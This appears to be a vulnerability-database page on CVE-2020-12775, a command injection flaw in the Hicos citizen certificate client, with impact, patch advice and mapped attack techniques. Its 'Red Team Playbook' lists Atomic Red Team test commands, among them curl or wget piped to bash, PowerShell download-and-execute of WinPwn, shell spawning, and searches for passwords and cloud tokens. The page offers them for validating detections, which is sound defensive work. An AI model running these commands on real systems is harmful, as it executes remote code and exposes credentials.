CVE-2020-12775
Overview
This vulnerability is a command injection flaw rooted in improper input validation within the Hicos citizen certificate client-side component. Specifically, the component fails to sanitize special characters in command parameters embedded in certain web URLs, enabling injection of arbitrary system commands. The affected feature is the URL handling mechanism of the client-side certificate processing module on macOS and Windows platforms.
Vulnerability Description
Hicos citizen certificate client-side component does not filter special characters for command parameters in specific web URLs. An unauthenticated remote attacker can exploit this vulnerability to perform command injection attack to execute arbitrary system command, disrupt system or terminate service.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary system commands on affected hosts, potentially disrupting system operations or terminating critical services. No authentication or user interaction is required, and the attack can be launched remotely over the network. Successful exploitation compromises confidentiality, integrity, and availability, as reflected by the CVSS vector (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H). This can lead to full system compromise, data manipulation, or denial of service in environments using the Hicos citizen certificate client.
Solution
According to the vendor advisory published by the Ministry of Digital Affairs Taiwan (https://www.twcert.org.tw/tw/cp-132-5695-421a7-1.html), users of the Hicos citizen certificate client-side component should update to the latest patched version provided by MoICA. The advisory includes updated binaries that implement proper input validation and escaping for command parameters in URLs. Administrators are advised to apply these updates promptly on macOS and Windows systems. No alternative workarounds are specified beyond applying the official patch.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Hicos citizen certificate client-side component arises from inadequate filtering of special characters in command parameters within specific web URLs. This oversight allows an unauthenticated remote attacker to inject arbitrary commands into the system. The lack of proper input validation creates a pathway for attackers to manipulate the application's behavior, potentially leading to unauthorized command execution on the underlying operating system. The severity of this vulnerability is underscored by its high CVSS score, indicating a critical risk that could be exploited with relative ease.
Attack vectors for this vulnerability primarily involve the manipulation of web requests sent to the Hicos application. An attacker can craft a malicious URL containing specially crafted parameters that exploit the command injection flaw. Upon successful exploitation, the attacker can execute arbitrary system commands, which may include actions such as accessing sensitive data, altering system configurations, or even terminating essential services. The simplicity of the attack, combined with the potential for significant impact, makes this vulnerability particularly concerning, as it does not require authentication, thus broadening the attack surface.
The real-world impact of this vulnerability can be profound, especially for organizations relying on the Hicos application for managing citizen certificates. Successful exploitation could lead to data breaches, service disruptions, and loss of trust from users and stakeholders. The ability to execute arbitrary commands means that attackers could not only compromise sensitive information but also potentially gain control over the entire system. This could result in financial losses, regulatory penalties, and long-term reputational damage. Organizations must recognize that the implications of such vulnerabilities extend beyond immediate technical concerns, affecting overall business continuity and operational integrity.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments, including penetration testing and code reviews, can help identify and remediate vulnerabilities before they are exploited. Additionally, employing web application firewalls (WAFs) can provide an additional layer of security by filtering out malicious requests that attempt to exploit command injection flaws. It is also crucial to ensure that all software components are kept up to date with the latest security patches, as vendors often release updates to address known vulnerabilities. Finally, educating developers on secure coding practices and the importance of input validation can help prevent similar vulnerabilities from being introduced in the future.
In conclusion, the command injection vulnerability in the Hicos citizen certificate client-side component presents a significant threat to organizations utilizing this software. The ease of exploitation, coupled with the potential for severe consequences, necessitates immediate attention from cybersecurity professionals. By adopting proactive detection and mitigation strategies, organizations can safeguard their systems against this and similar vulnerabilities, ultimately enhancing their overall security posture.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Moica | Hicos | All |
cpe:2.3:a:moica:hicos:*:*:*:*:*:macos:*:*
|
|
|
Moica | Hicos | All |
cpe:2.3:a:moica:hicos:*:*:*:*:*:windows:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
58%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
51%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-12775 |
| twcert.org.tw |
GitHub CVE
x_refsource_MISC
|
https://www.twcert.org.tw/tw/cp-132-5695-421a7-1.html |
| moica.nat.gov.tw |
GitHub CVE
x_refsource_MISC
|
https://moica.nat.gov.tw/rac_plugin.html |